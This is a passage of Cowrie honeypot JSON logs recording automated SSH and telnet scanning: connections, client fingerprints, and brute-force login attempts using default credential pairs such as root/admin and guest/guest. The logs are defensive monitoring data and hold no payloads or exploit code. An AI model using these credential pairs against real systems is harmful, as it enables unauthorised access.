tp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:43:01.107080Z","src_ip":"212.227.125.160","session":"d57d12da0370"}
{"eventid":"cowrie.login.failed","username":"system","password":"OkwKcECs8qJP2Z","message":"login attempt [system/OkwKcECs8qJP2Z] failed","sensor":"my-vps","timestamp":"2025-08-28T00:43:02.855306Z","src_ip":"212.227.125.160","session":"d57d12da0370"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:43:05.320012Z","src_ip":"212.227.125.160","session":"d57d12da0370"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":33232,"dst_ip":"1.2.3.4","dst_port":23,"session":"6eca255c9e96","protocol":"telnet","message":"New connection: 176.65.149.186:33232 (1.2.3.4:23) [session: 6eca255c9e96]","sensor":"my-vps","timestamp":"2025-08-28T00:43:36.606462Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:43:36.648829Z","src_ip":"176.65.149.186","session":"6eca255c9e96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T00:43:36.732220Z","src_ip":"176.65.149.186","session":"6eca255c9e96"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T00:43:36.733601Z","src_ip":"176.65.149.186","session":"6eca255c9e96"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T00:43:36.734432Z","src_ip":"176.65.149.186","session":"6eca255c9e96"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":54436,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0e43cf1b30a","protocol":"ssh","message":"New connection: 194.233.79.134:54436 (1.2.3.4:22) [session: e0e43cf1b30a]","sensor":"my-vps","timestamp":"2025-08-28T00:44:04.846580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:44:04.892440Z","src_ip":"194.233.79.134","session":"e0e43cf1b30a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:44:05.088942Z","src_ip":"194.233.79.134","session":"e0e43cf1b30a"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask","message":"login attempt [flask/flask] failed","sensor":"my-vps","timestamp":"2025-08-28T00:44:06.590575Z","src_ip":"194.233.79.134","session":"e0e43cf1b30a"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:44:07.866401Z","src_ip":"194.233.79.134","session":"e0e43cf1b30a"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":44400,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd2aec50f5af","protocol":"ssh","message":"New connection: 171.243.150.245:44400 (1.2.3.4:22) [session: bd2aec50f5af]","sensor":"my-vps","timestamp":"2025-08-28T00:44:11.078454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:44:11.082853Z","src_ip":"171.243.150.245","session":"bd2aec50f5af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41492,"dst_ip":"1.2.3.4","dst_port":22,"session":"8220da0bce4b","protocol":"ssh","message":"New connection: 212.227.125.160:41492 (1.2.3.4:22) [session: 8220da0bce4b]","sensor":"my-vps","timestamp":"2025-08-28T00:44:11.278944Z"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:44:11.310973Z","src_ip":"171.243.150.245","session":"bd2aec50f5af"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:44:11.361639Z","src_ip":"212.227.125.160","session":"8220da0bce4b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:44:11.511848Z","src_ip":"212.227.125.160","session":"8220da0bce4b"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-28T00:44:12.245276Z","src_ip":"171.243.150.245","session":"bd2aec50f5af"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:44:13.462435Z","src_ip":"171.243.150.245","session":"bd2aec50f5af"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-28T00:44:13.775675Z","src_ip":"212.227.125.160","session":"8220da0bce4b"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:44:15.063820Z","src_ip":"212.227.125.160","session":"8220da0bce4b"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.151.203","src_port":40744,"dst_ip":"1.2.3.4","dst_port":22,"session":"327c28227902","protocol":"ssh","message":"New connection: 171.243.151.203:40744 (1.2.3.4:22) [session: 327c28227902]","sensor":"my-vps","timestamp":"2025-08-28T00:44:30.490425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:44:30.499139Z","src_ip":"171.243.151.203","session":"327c28227902"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:44:30.696675Z","src_ip":"171.243.151.203","session":"327c28227902"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-28T00:44:32.838753Z","src_ip":"171.243.151.203","session":"327c28227902"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:44:34.052885Z","src_ip":"171.243.151.203","session":"327c28227902"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60398,"dst_ip":"1.2.3.4","dst_port":23,"session":"db18ea76ca93","protocol":"telnet","message":"New connection: 212.227.235.229:60398 (1.2.3.4:23) [session: db18ea76ca93]","sensor":"my-vps","timestamp":"2025-08-28T00:44:41.442794Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:44:41.654744Z","src_ip":"212.227.235.229","session":"db18ea76ca93"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T00:44:41.737913Z","src_ip":"212.227.235.229","session":"db18ea76ca93"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:44:54.985629Z","src_ip":"1.92.34.210","session":"7f5ac37f75b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41520,"dst_ip":"1.2.3.4","dst_port":22,"session":"52ab28cc50af","protocol":"ssh","message":"New connection: 212.227.125.160:41520 (1.2.3.4:22) [session: 52ab28cc50af]","sensor":"my-vps","timestamp":"2025-08-28T00:45:01.444692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:45:01.494689Z","src_ip":"212.227.125.160","session":"52ab28cc50af"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:45:02.618116Z","src_ip":"212.227.125.160","session":"52ab28cc50af"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-28T00:45:03.383098Z","src_ip":"212.227.125.160","session":"52ab28cc50af"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:45:04.938383Z","src_ip":"212.227.125.160","session":"52ab28cc50af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43266,"dst_ip":"1.2.3.4","dst_port":22,"session":"faaf9fa8686b","protocol":"ssh","message":"New connection: 212.227.235.229:43266 (1.2.3.4:22) [session: faaf9fa8686b]","sensor":"my-vps","timestamp":"2025-08-28T00:45:11.311347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:45:11.312145Z","src_ip":"212.227.235.229","session":"faaf9fa8686b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T00:45:11.640211Z","src_ip":"212.227.235.229","session":"faaf9fa8686b"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:45:19.312092Z","src_ip":"212.227.235.229","session":"faaf9fa8686b"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":44800,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cea2005b8ea","protocol":"ssh","message":"New connection: 194.233.79.134:44800 (1.2.3.4:22) [session: 5cea2005b8ea]","sensor":"my-vps","timestamp":"2025-08-28T00:45:55.550303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:45:55.767353Z","src_ip":"194.233.79.134","session":"5cea2005b8ea"}
